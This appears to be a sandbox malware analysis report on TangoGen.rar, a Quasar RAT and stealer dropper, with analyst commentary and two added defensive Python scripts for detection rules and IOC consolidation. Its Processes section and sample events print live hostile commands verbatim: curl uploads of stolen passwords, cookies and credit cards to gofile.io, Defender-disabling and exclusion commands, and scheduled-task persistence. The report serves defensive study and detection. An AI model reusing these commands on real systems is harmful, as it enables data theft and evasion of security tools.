Analysis Overview
SHA256
eb6f8f2a7f814d765640c5e6422921576383c85183677c8c1328f846bda5906e
Threat Level: Known bad
The file TangoGen.rar was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
UPX packed file
Drops startup file
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Checks processor information in registry
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-22 14:59
Signatures
Unsigned PE
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
298s
Max time network
304s
Command Line
Signatures
Quasar RAT
Quasar payload
The client is installed as C:\Users\Admin\AppData\Roaming\SubDir\Client.exe and registered with schtasks /create ... /sc ONLOGON ... /rl HIGHEST /f (see Processes). SubDir\Client.exe is Quasar's default install directory and file name, and the logon task at highest run level is its stock elevated startup method, consistent with the payload detection.
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
The values below are wextract_cleanupN RunOnce entries. They are written by the Windows self-extractor stub (wextract.exe, the IExpress runtime) so that its IXP00N.TMP staging directory is deleted at the next logon; the signature fires on them, but they are not payload persistence. What they do show is four nested self-extracting layers (IXP000 through IXP003), which is why the process chain in Processes is so deep. The payload's own persistence is the Startup-folder drop above and the two scheduled tasks listed further down.
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\TangoGen\TangoGenV1.3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DMMEIF~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE | N/A |
Legitimate hosting services abused for malware hosting/C2
Distinct indicators, with the number of times each was raised (34 rows in the raw report):
| Indicator | Hits |
| discord.com | 28 |
| 6.tcp.ngrok.io | 4 |
| raw.githubusercontent.com | 2 |
gofile.io, which receives the curl uploads shown in Processes, is not raised under this signature but does appear in Network.
Looks up external IP address via web service
| Indicator | Hits |
| api.ipify.org | 3 |
Detects Pyinstaller
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Two different tasks are created (command lines in Processes): "System32", triggered at logon with the highest run level and pointing at C:\Users\Admin\AppData\Roaming\SubDir\Client.exe (the Quasar client), and "Intel Processor ©", imported from an XML definition in %TEMP% immediately after C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe starts. The second one belongs to a separate chain (IXP002.TMP\svchost.exe, then XenoManager\svchost.exe) that no family signature on this page attributes. A task named "System32" and a task name containing © are both easy hunts in the Task Scheduler library.
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Image | Command line |
| C:\Users\Admin\AppData\Local\Temp\TangoGen\TangoGenV1.3.exe | "C:\Users\Admin\AppData\Local\Temp\TangoGen\TangoGenV1.3.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE |
| C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Built.exe | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Built.exe |
| C:\Windows\SYSTEM32\schtasks.exe | "schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f |
| C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE |
| C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE |
| C:\Windows\SYSTEM32\schtasks.exe | "schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f |
| C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE |
| C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DMMEIF~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DMMEIF~1.EXE |
| C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe |
| C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "ver" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid" |
| C:\Windows\SysWOW64\wbem\WMIC.exe | C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Get-Clipboard |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" " |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" |
| C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE |
| C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "ver" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile" |
| C:\Windows\SysWOW64\curl.exe | curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile" |
| C:\Windows\SysWOW64\curl.exe | curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile" |
| C:\Windows\SysWOW64\curl.exe | curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile" |
| C:\Windows\SysWOW64\curl.exe | curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile" |
| C:\Windows\SysWOW64\curl.exe | curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile" |
| C:\Windows\SysWOW64\curl.exe | curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE |
| C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe |
| C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe |
| C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe |
| C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe | "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "schtasks.exe" /Create /TN "Intel Processor ©" /XML "C:\Users\Admin\AppData\Local\Temp\tmp36F9.tmp" /F |
Reading the chain: the RAR contents run through four nested self-extractor layers (IXP000.TMP to IXP003.TMP) that in turn start the Quasar client (SubDir\Client.exe plus its logon task), a PyInstaller-built stealer (the IXP003 System32.exe / EPICGA~1.EXE stage, which fingerprints the host with ver and WMIC csproduct get uuid, reads the clipboard, and uploads cspasswords.txt, cscookies.txt, cscreditcards.txt, csautofills.txt, cshistories.txt and csbookmarks.txt to store10.gofile.io with curl -F), and a second implant under XenoManager. The Defender tampering is done before the stealer runs: real-time, IOAV, script scanning and IPS are switched off, controlled folder access is disabled, network protection is dropped to audit, cloud reporting and sample submission are turned off, AppData and every .exe are excluded. Note that the second exclusion expands %USERPROFILE%\Local to C:\Users\Admin\Local, a path that does not exist (AppData\Local was presumably intended), so the effective exclusions are AppData and the .exe extension. System32.exe and svchost.exe running from user-writable paths are straightforward masquerading indicators.
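The command lines above make a compact test set for process-creation detections. The following is an added example, not code from the sandbox or from any vendor product: a small rule set in the style of a Sigma-to-Python port, run over Sysmon Event ID 1 style records constructed from this report's Processes section. The rule names, regular expressions and the MITRE technique references in the comments are this example's own choices.

```python
"""Triage rules for the process chain in this report.

Added example, not part of the sandbox report or of any vendor product.
SAMPLE_EVENTS is constructed from the command lines in the Processes section;
the rule names and regexes are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str      # full path of the created process
    cmdline: str    # its command line as logged


# (tag, image regex or None, command-line regex); all matched case-insensitively.
RULES = [
    # Defender weakened via Set-/Add-MpPreference: features off, exclusions added (T1562.001)
    ("defender_tamper", None,
     r"(Set|Add)-MpPreference.*?(-Disable\w+\s+\$true|-Exclusion(Path|Extension|Process)"
     r"|-MAPSReporting\s+Disabled|-SubmitSamplesConsent|-EnableControlledFolderAccess\s+Disabled)"),
    # Logon-triggered or XML-defined task, or highest run level (T1053.005)
    ("schtasks_persist", r"schtasks\.exe$",
     r"/create\b.*?(/sc\s+ONLOGON|/rl\s+HIGHEST|/XML\s)"),
    # curl multipart upload of a local file to a file-sharing service (T1567.002)
    ("curl_upload_exfil", None,
     r"curl(\.exe)?\s.*?-F\s+\"?file=@.*?https?://\S*gofile\.io/"),
    # OS / hardware fingerprinting spawned from cmd (T1082)
    ("host_recon", None,
     r"csproduct\s+get\s+uuid|cmd\.exe\s+/c\s+\"?ver\"?\s*$"),
    # Clipboard capture via PowerShell (T1115)
    ("clipboard_capture", None, r"\bGet-Clipboard\b"),
]

# Windows binary names that only belong under C:\Windows (T1036.005)
SYSTEM_NAMES = {"svchost.exe", "system32.exe", "rundll32.exe"}


def classify(ev: ProcEvent) -> set:
    """Return the set of rule tags that fire on one process-creation event."""
    tags = set()
    for tag, img_re, cmd_re in RULES:
        if img_re and not re.search(img_re, ev.image, re.I):
            continue
        if re.search(cmd_re, ev.cmdline, re.I):
            tags.add(tag)
    name = ev.image.rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_NAMES and not ev.image.lower().startswith("c:\\windows\\"):
        tags.add("masquerade_user_path")
    return tags


def scan(events):
    """Map each tag to the command lines that triggered it, in input order."""
    hits = {}
    for ev in events:
        for tag in classify(ev):
            hits.setdefault(tag, []).append(ev.cmdline)
    return hits


# Constructed from the report's Processes table (a subset; paths as logged there).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SYSTEM32\schtasks.exe",
              r'"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f'),
    ProcEvent(r"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe",
              r'"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r'C:\Windows\system32\cmd.exe /c "ver"'),
    ProcEvent(r"C:\Windows\SysWOW64\wbem\WMIC.exe",
              r"C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r"powershell Get-Clipboard"),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true "
              r"-DisableRealtimeMonitoring $true -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"'),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"'''),
    ProcEvent(r"C:\Windows\SysWOW64\curl.exe",
              r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile'),
    ProcEvent(r"C:\Windows\SysWOW64\curl.exe",
              r'curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile'),
    ProcEvent(r"C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe",
              r'"C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\schtasks.exe",
              r'"schtasks.exe" /Create /TN "Intel Processor ©" /XML "C:\Users\Admin\AppData\Local\Temp\tmp36F9.tmp" /F'),
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe",
              r"C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\System32.exe"),
]

if __name__ == "__main__":
    for tag, cmds in scan(SAMPLE_EVENTS).items():
        print(f"{tag}: {len(cmds)} hit(s)")
        for c in cmds:
            print("    ", c[:110])
```

The masquerading check is deliberately a path test rather than a signature test: neither System32.exe nor a user-profile svchost.exe needs a known hash to be suspicious. The Defender rule fires on each individual PowerShell child, so the single cmd.exe wrapper that chains five of them produces six alerts in this run; group on parent PID when you tune it.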
Network
Distinct endpoints, with the number of connections observed for each (117 rows in the raw capture):
| Country | Destination | Domain | Proto | Hits |
| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp | 21 |
| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp | 6 |
| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp | 10 |
| US | 3.140.223.7:17147 | 6.tcp.ngrok.io | tcp | 5 |
| US | 3.141.142.211:16799 | 6.tcp.ngrok.io | tcp | 9 |
| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp | 5 |
| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp | 7 |
| US | 3.132.159.158:17147 | 6.tcp.ngrok.io | tcp | 4 |
| US | 162.159.128.233:443 | discord.com | tcp | 27 |
| US | 104.21.95.148:443 | rentry.co | tcp | 4 |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp | 1 |
| US | 172.67.74.152:443 | api.ipify.org | tcp | 2 |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp | 1 |
| FR | 151.80.29.83:443 | api.gofile.io | tcp | 1 |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp | 3 |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp | 5 |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp | 1 |
| US | 8.8.8.8:53 | 74.90.14.23.in-addr.arpa | udp | 1 |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp | 1 |
| N/A | 127.0.0.1:50542 | N/A | tcp | 1 |
| N/A | 127.0.0.1:50552 | N/A | tcp | 1 |
| N/A | 127.0.0.1:50558 | N/A | tcp | 1 |
6.tcp.ngrok.io resolved to four different AWS addresses within this single run and was contacted on two tunnel ports (16799 and 17147), so detection and blocking should key on the hostname and port pair rather than on any of the addresses. api.gofile.io and store10.gofile.io carry the curl uploads listed in Processes; discord.com, rentry.co and raw.githubusercontent.com are the hosts the sandbox flags as abused hosting; tse1.mm.bing.net and the PTR lookups are typical Windows background traffic.
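The table above is the kind of output that gets pasted into a blocklist verbatim, which for an ngrok tunnel is the wrong unit of blocking. The following is an added example, not code from the sandbox or from any vendor tool: it parses rows in this report's table format (including the loopback rows whose cells are shifted one column to the left), collapses them to distinct endpoints, flags hostnames that resolved to more than one address, and emits host:port indicators grouped by the role the sandbox signatures assign. SAMPLE_ROWS is a constructed subset of the table; the category names and the hostname-to-category mapping are this example's own.

```python
"""Consolidate the sandbox Network table into IOCs.

Added example; not part of the report or of any vendor tool. SAMPLE_ROWS is a
subset of the table above, constructed here as offline input; the category
names and the hostname-to-category mapping are this example's own.
"""
import re
from collections import Counter, defaultdict

ROW_RE = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*$")
ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+)$")

# Hostname -> category, following the signatures the sandbox raised above.
CATEGORIES = {
    "6.tcp.ngrok.io": "tunnel_c2",
    "discord.com": "abused_hosting",
    "raw.githubusercontent.com": "abused_hosting",
    "rentry.co": "abused_hosting",
    "api.gofile.io": "exfil_upload",
    "store10.gofile.io": "exfil_upload",
    "api.ipify.org": "external_ip_lookup",
    "geolocation-db.com": "external_ip_lookup",
}


def parse_row(line):
    """One markdown table row -> dict, or None for the header and non-rows."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    country, dest, domain, proto = m.groups()
    # The loopback rows in the report are shifted one cell to the left
    # ("| N/A | 127.0.0.1:50542 | tcp | |"): the protocol sits in the Domain cell.
    if proto == "" and domain in ("tcp", "udp"):
        domain, proto = "N/A", domain
    em = ENDPOINT_RE.match(dest)
    if not em:
        return None
    return {"country": country, "ip": em.group(1), "port": int(em.group(2)),
            "domain": domain, "proto": proto}


def consolidate(lines):
    """Return (Counter keyed by (ip, port, domain, proto), {domain: {(ip, port)}})."""
    conns = [c for c in map(parse_row, lines) if c]
    hits = Counter((c["ip"], c["port"], c["domain"], c["proto"]) for c in conns)
    by_domain = defaultdict(set)
    for c in conns:
        by_domain[c["domain"]].add((c["ip"], c["port"]))
    return hits, dict(by_domain)


def rotating_hosts(by_domain):
    """Hostnames seen with more than one address: block these by name, not by IP."""
    out = {}
    for domain, endpoints in by_domain.items():
        ips = sorted({ip for ip, _ in endpoints})
        if len(ips) > 1:
            out[domain] = ips
    return out


def iocs(by_domain):
    """{category: {"host:port"}}; hostnames outside CATEGORIES are listed for review."""
    out = defaultdict(set)
    for domain, endpoints in by_domain.items():
        cat = CATEGORIES.get(domain)
        if cat is None:
            out["uncategorised"].add(domain)
            continue
        for _ip, port in endpoints:
            out[cat].add(f"{domain}:{port}")
    return dict(out)


# Constructed subset of the report's Network table, header and malformed row included.
SAMPLE_ROWS = [
    "| Country | Destination | Domain | Proto |",
    "| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |",
    "| US | 3.141.177.1:16799 | 6.tcp.ngrok.io | tcp |",
    "| US | 3.141.177.1:17147 | 6.tcp.ngrok.io | tcp |",
    "| US | 3.140.223.7:16799 | 6.tcp.ngrok.io | tcp |",
    "| US | 3.141.142.211:17147 | 6.tcp.ngrok.io | tcp |",
    "| US | 3.132.159.158:16799 | 6.tcp.ngrok.io | tcp |",
    "| US | 162.159.128.233:443 | discord.com | tcp |",
    "| US | 162.159.128.233:443 | discord.com | tcp |",
    "| FR | 31.14.70.252:443 | store10.gofile.io | tcp |",
    "| US | 172.67.74.152:443 | api.ipify.org | tcp |",
    "| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |",
    "| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |",
    "| N/A | 127.0.0.1:50542 | tcp | |",
]

if __name__ == "__main__":
    hits, by_domain = consolidate(SAMPLE_ROWS)
    for key, n in hits.most_common():
        print(n, *key)
    print("rotating:", rotating_hosts(by_domain))
    print("iocs:", iocs(by_domain))
```

The uncategorised bucket is intentionally not dropped: on this report it holds the Bing and PTR noise, but on the next one it is where an unlisted C2 host would surface.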
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TANGOG~1.EXE
| MD5 | ea0f2bf412f49a4d131e186647e430fa |
| SHA1 | a05b3d2e924b385089fcf477155c11af0d3852af |
| SHA256 | f29dad7c38548748e8705ff719b4bba758bae20561318a91b3f4de65e715f6c9 |
| SHA512 | d360a148f83b4f5b2b03a445f566549aa1cf187640b4cd81d4854845f0415c96ea46f4a8afdb75ab03d0987b28fbf8eaf8d4a332b4d1c8587c77255188f97587 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Built.exe
| MD5 | 415b798b89de60513a68357847e0892d |
| SHA1 | 76703f5121b80e67a4b55fba3a68ea57d452952b |
| SHA256 | b4d710f8d33014f5b77ff61f10bc70df4eec50e0a954c7ef5f09fb75e62ca110 |
| SHA512 | c6463d4e828cd18c4f95e11023a2d85e8a24bcce8a2b616d23a6b76f47a45a7a77f6b66d2d09f88228252ace251150216086c159e4a5e73489ef5349ecd213dd |
memory/1032-13-0x00007FF8A7930000-0x00007FF8A83F2000-memory.dmp
memory/1032-14-0x0000000000070000-0x0000000000394000-memory.dmp
memory/1032-15-0x000000001B040000-0x000000001B050000-memory.dmp
memory/1032-23-0x00007FF8A7930000-0x00007FF8A83F2000-memory.dmp
memory/656-22-0x00007FF8A7930000-0x00007FF8A83F2000-memory.dmp
memory/656-24-0x000000001B040000-0x000000001B050000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TANGOG~1.EXE
| MD5 | 418826371c8cb889128cdfa3615fa99d |
| SHA1 | d4bfaf14d2801611e2a64120aba2a2eb0fb52d4a |
| SHA256 | 48d96c17a1f0557d4ded682f7bd4179d463327685543b23100ef9152fa54412b |
| SHA512 | c1fcad76fe6cf5d1af8168f334226a7153a4ac407efe93393f008e35f2ee5db4eb7091ea65a1d56f66d99696013192c214d54ecd022d883104b4325132628044 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TANGOG~1.EXE
| MD5 | cca4410ce6b5c64389e221899c7924f5 |
| SHA1 | b43ecf2734266f0a0648ff6909eeab0b7cd162be |
| SHA256 | 5263a206f4c5bfaf4d64778507820df4e04273e19f767df253aa20fae1e31647 |
| SHA512 | 616bb3a340e2a1ebf9c13d40868a2d3207b159757d9034621ecdec9d3c223e876a7cdcc39149d1e27b740cad937ccb8d36d79d418267c84393349d57b295d74e |
memory/656-85-0x000000001BC70000-0x000000001BCC0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI22762\ucrtbase.dll
| MD5 | 0e0bac3d1dcc1833eae4e3e4cf83c4ef |
| SHA1 | 4189f4459c54e69c6d3155a82524bda7549a75a6 |
| SHA256 | 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae |
| SHA512 | a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\_MEI22762\VCRUNTIME140.dll
| MD5 | 11d9ac94e8cb17bd23dea89f8e757f18 |
| SHA1 | d4fb80a512486821ad320c4fd67abcae63005158 |
| SHA256 | e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e |
